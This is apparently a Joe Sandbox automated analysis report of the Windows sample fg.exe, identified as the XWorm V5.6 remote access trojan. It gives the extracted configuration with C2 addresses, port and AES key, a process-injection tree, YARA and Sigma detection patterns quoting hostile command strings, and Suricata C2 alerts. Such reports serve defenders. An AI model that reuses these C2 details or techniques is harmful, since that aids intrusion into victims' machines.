Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
fg.exe

Overview

General Information

Sample name:fg.exe
Analysis ID:1632841
MD5:570bc151bf5d20eea56d4ad306344238
SHA1:277af0f90afaa930f065b5d72a7fb06739031157
SHA256:1be3f3449a4fbe09203249d212c1abe8aead0d3e3ad9c499f0c0e9aaa76f198a
Tags:185-7-214-54AsyncRATbookingClickFixexeFakeCaptchauser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • fg.exe (PID: 7816 cmdline: "C:\Users\user\Desktop\fg.exe" MD5: 570BC151BF5D20EEA56D4AD306344238)
    • csc.exe (PID: 6364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp" "c:\Users\user\AppData\Local\Temp\cy31atwy\CSC8910777A3B084AE58CA4772E6114D41.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 3708 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • WerFault.exe (PID: 7228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • conhost.exe (PID: 3708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["185.7.214.108", "185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dllJoeSecurity_XWormYara detected XWormJoe Security
    C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dllrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
    • 0x5ea9:$str01: $VB$Local_Port
    • 0x5e9a:$str02: $VB$Local_Host
    • 0x61a0:$str03: get_Jpeg
    • 0x5b52:$str04: get_ServicePack
    • 0x6b6e:$str05: Select * from AntivirusProduct
    • 0x6d6c:$str06: PCRestart
    • 0x6d80:$str07: shutdown.exe /f /r /t 0
    • 0x6e32:$str08: StopReport
    • 0x6e08:$str09: StopDDos
    • 0x6efe:$str10: sendPlugin
    • 0x6f7e:$str11: OfflineKeylogger Not Enabled
    • 0x70d6:$str12: -ExecutionPolicy Bypass -File "
    • 0x71ff:$str13: Content-length: 5235
    C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dllMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x72a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7345:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x745a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x711a:$cnc4: POST / HTTP/1.1

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x6aa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x6b45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x6c5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x691a:$cnc4: POST / HTTP/1.1
      00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmprat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
        • 0x5ea9:$str01: $VB$Local_Port
        • 0x5e9a:$str02: $VB$Local_Host
        • 0x61a0:$str03: get_Jpeg
        • 0x5b52:$str04: get_ServicePack
        • 0x6b6e:$str05: Select * from AntivirusProduct
        • 0x6d6c:$str06: PCRestart
        • 0x6d80:$str07: shutdown.exe /f /r /t 0
        • 0x6e32:$str08: StopReport
        • 0x6e08:$str09: StopDDos
        • 0x6efe:$str10: sendPlugin
        • 0x6f7e:$str11: OfflineKeylogger Not Enabled
        • 0x70d6:$str12: -ExecutionPolicy Bypass -File "
        • 0x71ff:$str13: Content-length: 5235
        00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x72a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7345:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x745a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x711a:$cnc4: POST / HTTP/1.1
        Click to see the 15 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        8.3.csc.exe.9dbdf0.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          8.3.csc.exe.9dbdf0.1.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x58a9:$str01: $VB$Local_Port
          • 0x589a:$str02: $VB$Local_Host
          • 0x5ba0:$str03: get_Jpeg
          • 0x5552:$str04: get_ServicePack
          • 0x656e:$str05: Select * from AntivirusProduct
          • 0x676c:$str06: PCRestart
          • 0x6780:$str07: shutdown.exe /f /r /t 0
          • 0x6832:$str08: StopReport
          • 0x6808:$str09: StopDDos
          • 0x68fe:$str10: sendPlugin
          • 0x697e:$str11: OfflineKeylogger Not Enabled
          • 0x6ad6:$str12: -ExecutionPolicy Bypass -File "
          • 0x6bff:$str13: Content-length: 5235
          8.3.csc.exe.9dbdf0.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6b1a:$cnc4: POST / HTTP/1.1
          8.3.csc.exe.9dbdf0.2.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
            8.3.csc.exe.9dbdf0.2.raw.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x58a9:$str01: $VB$Local_Port
            • 0x589a:$str02: $VB$Local_Host
            • 0x5ba0:$str03: get_Jpeg
            • 0x5552:$str04: get_ServicePack
            • 0x656e:$str05: Select * from AntivirusProduct
            • 0x676c:$str06: PCRestart
            • 0x6780:$str07: shutdown.exe /f /r /t 0
            • 0x6832:$str08: StopReport
            • 0x6808:$str09: StopDDos
            • 0x68fe:$str10: sendPlugin
            • 0x697e:$str11: OfflineKeylogger Not Enabled
            • 0x6ad6:$str12: -ExecutionPolicy Bypass -File "
            • 0x6bff:$str13: Content-length: 5235
            Click to see the 37 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Dynamic .NET Compilation Via Csc.EXE
            Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\fg.exe", ParentImage: C:\Users\user\Desktop\fg.exe, ParentProcessId: 7816, ParentProcessName: fg.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", ProcessId: 6364, ProcessName: csc.exe
            Sigma detected: Dynamic CSharp Compile Artefact
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\fg.exe, ProcessId: 7816, TargetFilename: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline

            Data Obfuscation

            barindex
            Sigma detected: Dot net compiler compiles file from suspicious location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\fg.exe", ParentImage: C:\Users\user\Desktop\fg.exe, ParentProcessId: 7816, ParentProcessName: fg.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", ProcessId: 6364, ProcessName: csc.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-09T09:54:41.137968+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:54:49.103771+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:54:59.846599+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:10.597041+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:11.136563+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:11.370497+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:21.346909+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:32.097952+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:41.127095+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:42.851272+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:53.596428+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:55:59.800623+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:10.550168+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:11.138705+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:12.325511+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:17.800251+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:21.253060+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:21.378089+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:21.503002+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:21.628207+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:32.299997+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:41.137735+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:42.512892+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:42.682498+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:46.213505+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:56:47.816066+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            2025-03-09T09:57:00.497485+010028528701Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-09T09:54:49.106070+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:54:59.849214+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:55:10.598954+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:55:21.349433+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:55:32.099808+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:55:42.853323+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:55:53.597859+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:55:59.803404+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:10.552329+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:12.332358+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:17.802707+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:21.255206+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:21.379723+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:21.519062+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:21.629911+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:32.311152+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:42.516423+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:42.684479+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:46.215487+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            2025-03-09T09:56:47.818411+010028529231Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-09T09:54:41.137968+010028588011Malware Command and Control Activity Detected185.7.214.1084411192.168.2.449717TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-09T09:54:48.882992+010028588001Malware Command and Control Activity Detected192.168.2.449717185.7.214.1084411TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: fg.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dllAvira: detection malicious, Label: TR/Dropper.Gen7
            Found malware configuration
            Source: 0000000C.00000002.2858010700.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["185.7.214.108", "185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Multi AV Scanner detection for submitted file
            Source: fg.exeVirustotal: Detection: 66%Perma Link
            Source: fg.exeReversingLabs: Detection: 63%
            Joe Sandbox ML detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 185.7.214.108,185.7.214.54
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: 4411
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: P0WER
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: XWorm V5.6
            Source: 0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmpString decryptor: USB.exe
            Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.4:49719 version: TLS 1.2
            Source: fg.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: System.Configuration.pdbL0uw# source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb< source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: %%.pdb(s( source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbngVideMRw source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbs>x source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: C:\Windows\MSBuild.pdbpdbild.pdbK> source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb(@ source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000ED0000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbr2 source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: uild.pdb source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: HPjo0C:\Windows\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: q7C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.pdb@\ source: fg.exe, 00000004.00000002.1403589030.0000000002C81000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdbP source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Xml.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.PDB source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: ?voC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2860132491.0000000005E20000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdbI source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.pdb source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Xml.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Windows.Forms.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: @vo.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2856933823.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Drawing.pdb| source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb~ source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Management.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Management.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: MSBuild.exe, 0000000C.00000002.2859421806.000000000528B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32##5 source: MSBuild.exe, 0000000C.00000002.2856933823.0000000000F22000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WERB78B.tmp.dmp.19.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERB78B.tmp.dmp.19.dr

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 185.7.214.108:4411 -> 192.168.2.4:49717
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 185.7.214.108:4411 -> 192.168.2.4:49717
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.4:49717 -> 185.7.214.108:4411
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49717 -> 185.7.214.108:4411
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 185.7.214.108
            Source: Malware configuration extractorURLs: 185.7.214.54
            Source: global trafficTCP traffic: 192.168.2.4:49717 -> 185.7.214.108:4411
            Source: Joe Sandbox ViewIP Address: 185.7.214.108 185.7.214.108
            Source: Joe Sandbox ViewASN Name: DELUNETDE DELUNETDE
            Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.27
            Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
            Source: unknownTCP traffic detected without corresponding DNS query: 185.7.214.108
